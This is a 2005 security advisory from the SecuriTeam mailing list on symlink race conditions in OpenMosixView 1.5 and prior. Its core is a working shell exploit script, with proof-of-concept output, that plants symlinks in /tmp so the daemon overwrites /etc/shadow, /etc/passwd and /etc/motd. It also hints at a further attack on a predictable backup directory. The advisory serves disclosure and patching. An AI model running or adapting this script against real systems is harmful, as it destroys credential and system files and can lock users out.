[UNIX] OpenMosixView Multiple Race Conditions

From: SecuriTeam (support_at_securiteam.com)
Date: 03/28/05

  • Next message: SecuriTeam: "[NEWS] Netcomm 1300NB DSL Modem DoS" 
    To: list@securiteam.com
Date: 28 Mar 2005 10:14:14 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      OpenMosixView Multiple Race Conditions
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.openmosixview.com/> OpenMosix is "a Linux kernel extension
    for single-system image clustering which turns a network of ordinary
    computers into a supercomputer".

    Lack of file content checking and file types allows local attackers to
    remove arbitrary files stored by the OpenMosix operating system.

    DETAILS

    Vulnerable Systems:
     * OpenMosixView version 1.5 and prior

    At each start of the OpenMosixCollector daemon, each node's data load and
    saving is assigned to the directory /tmp/openmosixcollector where data are
    organised in several files:
            [ file ] cluster
            [ file ] IDnode-n
            [ file ] IDnode-n
            [ file ] sync.count
            [ dir ] phist

    The creation of predictable files allow any local attacker to remove
    arbitrary files on the vulnerable file system via a symlink vulnerability.
    In this case, we just have to rebuild a fake directory tree.

    If openmosixcollector-daemon is already running there is also a way to
    corrupt the fs due to the creation of a predictable temporary backup
    directory evert 12 hours (see exploit below for more details).

    Exploit:
    #!/bin/sh
    ###############################################
    # RX_oMcollector_proof.sh
    # OpenMosixCollector exploit [25/03/2005]
    # by Gangstuck and Psirac <research@rexotec.com>
    ###############################################

    # -- Choose target
    TARGET1="/etc/shadow" # OM view target
    TARGET2="/etc/passwd" # OM collector target 1
    TARGET3="/etc/motd" # OM collector target 2

    # -- OpenMosixCollector temporary directory (without final '/')
    OMCTDIR="/tmp/openmosixcollector"

    echo "--------------------------------------------------------"
    echo "- -= OpenMosixView and OpenMosixCollector =- -"
    echo "- Symlink Vulnerability PoC -"
    echo "- [versions 1.5 and minor] -"
    echo "--------------------------------------------------------"
    echo "- Gangstuck and Psirac -"
    echo "- <research@rexotec.com> -"
    echo "--------------------------------------------------------"

    # -- OM View
    ln -sf $TARGET1 /tmp/nodes.tmp
    if [ $? ]; then
       echo "[+] OpenMosixView attack successfully launched."
       echo -e " - target is ${TARGET1}\n"
    else
       echo "[!] Failed to exploit OpenMosixView..."
    fi

    # -- OM Collector
    if [ -d "$OMCTDIR" ]; then
    echo -e "[!] Openmosix is already running.\n
       Anyway, there is a way to exploit this case but this is not
       implemented in this public exploit. OpenMosixcollector-daemon
       automatically restarts every 12 hours and saves the current
       history to a directory located in /tmp (glibc: P_tmpdir).
       
       This is done whith the utilisation of a predictable temporary
       dir name \"${OMCTDIR}_[date]\" where [date] format
       look like \"18.0.2005-0.0.48\". Have phun :P"
       exit 0
    fi
            
    echo -e "[-] OpenMosixCollector seems not to be started..."
    echo " - creating fake directory"
    mkdir $OMCTDIR
    if [ ! $? ]; then
       echo "[!] OpenMosixCollector attack failed !"
       exit 1
    fi
    echo " - creating symlink attack against "
    echo -e "\t> ${TARGET2}" && ln -sf $TARGET2 ${OMCTDIR}/cluster;
    echo -e "\t> ${TARGET3}" && ln -sf $TARGET3 ${OMCTDIR}/sync.count;

    echo "[+] OpenMosixCollector attack successfully launched."

    #EOF

    Proof of Concept:
    $ ./RX_OMcollector_proof.sh
    ..
    $ ls -l /tmp/nodes.tmp
    lrwxrwxrwx 1 gang gang 12 2005-02-21 23:18 /tmp/nodes.tmp -> /etc/shadow

    # openmosixview &
    openMosix is started!
    openMosix cluster contains 3 members.
    cluster config changed! redraw cluster now.

    $ cat /etc/shadow
    192.168.0.11

    # /etc/init.d/openmosixcollector start
    Initializing openMosix...
    openMosix configuration was successful :)

    # ls -l /tmp/openmosixcollector/
    rwxrwxrwx 1 user user 12 2004-12-21 23:19 cluster -> /etc/passwd
    drwxr-xr-x 2 root root 1024 2004-12-21 23:25 phist
    lrwxrwxrwx 1 user user 12 2004-12-21 23:19 sync.count -> /etc/motd
    # cat /etc/passwd
    21.12.2005-23.25.59 5 184 1757 13 3
    21.12.2005-23.26.10 5 184 1757 13 3
    # cat /etc/motd

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:research@rexotec.com>
    rexolab.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[NEWS] Netcomm 1300NB DSL Modem DoS"